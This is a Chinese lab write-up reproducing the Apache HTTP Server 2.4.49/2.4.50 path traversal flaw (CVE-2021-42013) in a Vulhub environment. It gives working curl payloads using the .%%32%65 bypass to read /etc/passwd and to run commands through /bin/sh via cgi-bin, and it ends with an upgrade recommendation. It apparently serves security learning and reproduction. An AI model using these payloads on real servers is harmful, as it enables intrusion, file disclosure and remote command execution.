Apache HTTP_2.4.50_路径穿越漏洞(CVE-2021-42013)

1.1、漏洞描述

CVE-2021-42013是由CVE-2021-41773的不完整修复导致的漏洞，攻击者可以使用路径遍历攻击将URL映射到由类似别名指令配置的目录之外的文件

此漏洞影响Apache HTTP Server 2.4.49和2.4.50，而不影响更早版本。

1.2、漏洞等级

高危

1.3、影响版本

Apache HTTP Server 2.4.49以及2.4.50两个版本

1.4、漏洞复现

1、基础环境

Path：Vulhub/httpd/CVE-2021-42013

启动测试环境：

docker-compose build
sudo docker-compose up -d

访问http://your-ip:8080/即可看到Apache HTTP Server的It works!

2、漏洞扫描

3、漏洞验证

可以直接利用上面扫描工具扫描出来的链接

也可以用下面的操作

Apache HTTP Server 2.4.50修补了以前的CVE-2021-41773漏洞

但可以使用.%%32%65进行绕过（注意其中的/icons/必须是一个存在且可访问的目录）

方式一 curl

 curl -v --path-as-is http://192.168.80.141:8080/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd

在服务器上启用mods cgi或cgid后，此路径遍历漏洞将允许执行任意命令

 curl -v --data "echo;id" 'http://192.168.80.141:8080/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'

方式二 bp抓捕

1.5、修复建议

升级至最新版本

本栏目推荐文章
• 代码随想录 day18 找树左下角的值 路径总和 从中序与后序遍历序列构造二叉树
• 2021-2022 ICPC Northwestern European Regional Programming Contest (NWERC 2021)
• OFBiz RCE漏洞复现（CVE-2023-51467）
• web项目启动时dubbo报错： No provider available for the service com.davidhu.shopguide.api.service.UserEventService from the url zookeeper ://localhost:2181/org.apache.du
• 代码随想录 day17 平衡二叉树 二叉树的所有路径 左叶子之和
• 2016-4-3、路径解析
• linux ubantu新建用户su后不显示用户名、路径等前缀问题解决方案
• 如何判断一个网站是用的Nginx，还是Apache
• cdn引入vue后报错无法识路径 Uncaught TypeError: Failed to resolve module specifier "vue". Relative references must start with either "/", "./", or "../".
• 2020-2021 ACM-ICPC, Asia Seoul Regional Contest

路径 漏洞 Apache 42013 2021路径 漏洞apache 42013 路径 漏洞apache 41773 路径 漏洞apache server apache-cve apache 41773 2021 漏洞apache 漏洞rocketmq代码apache 序列 漏洞apache shiro 漏洞apache tomcat 29885 漏洞apache 15715 httpd 漏洞log4j 44228 2021